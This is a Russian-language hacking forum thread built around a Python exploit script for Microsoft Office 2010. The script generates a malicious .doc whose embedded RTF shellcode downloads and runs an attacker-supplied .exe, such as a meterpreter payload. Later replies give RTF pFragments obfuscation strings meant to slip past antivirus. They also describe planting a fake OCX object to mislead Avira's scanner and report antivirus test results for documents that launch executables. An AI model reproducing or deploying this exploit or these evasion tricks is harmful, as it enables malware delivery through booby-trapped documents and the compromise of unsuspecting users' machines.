MS Office 2010 Download Execute 0day

Отслеживать

pwd

CD-диск
Пользователь
Регистрация
14.01.2013
Сообщения
11
Реакции
0
MS Office 2010 Download Execute 0day
Written By g11tch
Exploit can also be found: http://www.exploit-db.com/exploits/24526
Код: 
#!/usr/bin/python

# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL 
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe

import binascii
import sys
import time

print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your  .doc ? "
print " Example:   TotallyTrusted.doc "
filename = raw_input()

print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe   "

url = raw_input()

print "Gears and Cranks working  mag1c in the background  "
time.sleep(3)
close="{}}}}}"
binme=binascii.b2a_hex(url)
file=('e1xydGYxbnNpbnNpY3BnMTI1MlxkZWZmMFxkZWZsYW5nMTAzM3sNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb250dGJsew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN3aXNzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyc2V0MCBBcmlhbDt9fXtcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4xNS4xNTA3O30NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlld2tpbmQ0XHVjMVxwYXJkDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMyMCBwYXJkXGYwXGZzXHBhci90YWJccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhclxwYXJ7XHNocHtcc3B9fXtcc2hwe1xzcH19e1xzaHB7XHNwfX17XHNocHtcKlxzaHBpbnN0XHNocGZoZHIwXHNocGJ4Y29sdW1uXHNocGJ5cGFyYVxzaCBwd3IyfXtcc3B7XHNue317fXtcc259e1xzbn17XCpcKn1wRnJhZ21lbnRzfXtcKlwqXCp9e1wqXCpcc3Z7XCp9OTsyO2ZmZmZmZmZmZmYjMDUwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwZTBiOTJjM2ZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBNWMxMTEwM2ZhNTljMzgzZmNmYWYzOTNmMTAwMTA0MDEwMTAxMDEwMTAxMDEwMTAxZTBiOTJjM2YwMDgwMDAwMDQ2Y2IzOTNmZGVhZGJlZWZlMGI5MmMzZmMwM2QzYjNmY2MzMzIyM2ZkZjU5MmQzZmM0M2QzYjNmY2MxODJmM2ZjNDNkM2IzZjVlNzQyYjNmNWU3OTM5M2YyNDAwMDAwMDQ0Y2IzOTNmc2x1dGZ1Y2s2NzgyMzkzZmRlMTYzYTNmNjc4MjM5M2ZlMGI5MmMzZmMwM2QzYjNmYTU5YzM4M2Y3YzBhMmIzZmUwYjkyYzNmNTU2Njc3ODhjMDNkM2IzZmE1OWMzODNmZmJiZTM4M2ZlMGI5MmMzZjgwMDAwMDAwYjQ0MTM0M2Y1NTU1NTU1NTY2NjY2NjY2Y2ZhZjM5M2Y0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxZWI3NzMxYzk2NDhiNzEzMDhiNzYwYzhiNzYxYzhiNWUwODhiN2UyMDhiMzY2NjM5NGYxODc1ZjJjMzYwOGI2YzI0MjQ4YjQ1M2M4YjU0MDU3ODAxZWE4YjRhMTg4YjVhMjAwMWViZTMzNDQ5OGIzNDhiMDFlZTMxZmYzMWMwZmNhYzg0YzA3NDA3YzFjZjBkMDFjN2ViZjQzYjdjMjQyODc1ZTE4YjVhMjQwMWViNjY4YjBjNGI4YjVhMWMwMWViOGIwNDhiMDFlODg5NDQyNDFjNjFjM2U4OTJmZmZmZmY1ZjgxZWY5OGZmZmZmZmViMDVlOGVkZmZmZmZmNjg4ZTRlMGVlYzUzZTg5NGZmZmZmZjMxYzk2NmI5NmY2ZTUxNjg3NTcyNmM2ZDU0ZmZkMDY4MzYxYTJmNzA1MGU4N2FmZmZmZmYzMWM5NTE1MThkMzc4MWM2ZWVmZmZmZmY4ZDU2MGM1MjU3NTFmZmQwNjg5OGZlOGEwZTUzZTg1YmZmZmZmZjQxNTE1NmZmZDA2ODdlZDhlMjczNTNlODRiZmZmZmZmZmZkMDYzNmQ2NDJlNjU3ODY1MjAyZjYzMjAyMDYxMmU2NTc4NjUwMA==\n')
textfile = open(filename , 'w')
textfile.write(file.decode('base64')+binme+close)
textfile.close()
time.sleep(3)
print "enjoy"
 
тебе в двух словах что ли рассказать? что за вопрос я не пойму, спроси у автомеханика например, "ну расскажи как машины чинить". руками, разбирайся со структурой файла, читай спецификации, анализируй семплы с itw и думай.
 
под MS12-027 и MS10-087 вообще нет нормальных рабочих эксплойтов фактически в паблике. не говоря уже об универсальных, которые пробивали бы сразу все офисы одним документом. проблема: ASLR / DEP / SafeSEH, к которым плюс ко всему добавляется тот факт, что существует множество версий non-ASLR библиотек, в которых очень сложно найти универсальные адреса для ROP-цепочки.
тем не менее сделать универсальный эксплойт под MS Word, который бы пробивал сразу 2003 / 2007 и 2010 с помощью всего 1 документа реально, хоть и сложно. без никаких JIT-спреев, левых окошек и прочих сомнительных моментов.
 
тебе в двух словах что ли рассказать? что за вопрос я не пойму, спроси у автомеханика например, "ну расскажи как машины чинить". руками, разбирайся со структурой файла, читай спецификации, анализируй семплы с itw и думай.

все по делу. но попробую в двух словах, т.к вопросом занимался плотно.
примеры обфускации pFragments (MS10-087) с использованием спецсимволов и особенностей формата:

Код: 
{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\shpbypara\sh}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv {\*}3;1;11111111111111111{}}}}

Код: 
{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\shpbypara\sh}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\SV 1,1,1}{\*\*\*}{{\*}\sv {\*}3;1;11111111	111111111{}}}}

Код: 
{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\shpbypara\sh}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFrAgMeNts}{\*\*\*}{{\*}\sv {\*}3;1;####[1]*$#1*$#1*$#1*#1*$###1]11111111111{}}}}

нули можно заменить на буквы ABCDEF большим регистром. например:

Код: 
3;1;123412341234000000001234

меняем на:

Код: 
3;1;123412341234AAAABBCC1234

все элементарно.
с MS12-027 аналогичный подход, хотя там есть свои хитрости и особенности ;)
некоторые антивирусы детектируют по структуре вложенного OCX-объекта и отталкиваются от особенностей уязвимости (проверяет конкретные DWORD'ы и условия, при которых возникает переполнение буфера в стеке). некоторые антивирусы (Avira), например, сканируют структуру документа. сформировать документ можно таким образом, чтобы создать подложный (фейковый) OCX, который Avira примет за реальный и просканирует совсем не то, что нужно. а вот Word в свою очередь проигнорирует фейковый OCX и обработает тот, что нам нужен.
 
Проверял на сервисе реакцию АВ на открытие документа .doc/.docx с разными техниками запуска EXE, результаты:
http://testpoligon.com/reports/F3753FEA6FD...348/report.html - макросы
http://testpoligon.com/reports/777873C9E38...355/report.html - вложение
http://testpoligon.com/reports/C5D0C9334E4...358/report.html - эксплоит CVE-2012-0158 для офиса 2010 от bmr c этого форума (надеюсь он непротив)

К сервису никаких претензий, всё на высоте, но конечно порекомендовал бы выложить фото о реальности машин. На счёт связи с АВ сказать ничего не могу, так что на свой страх и риск.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх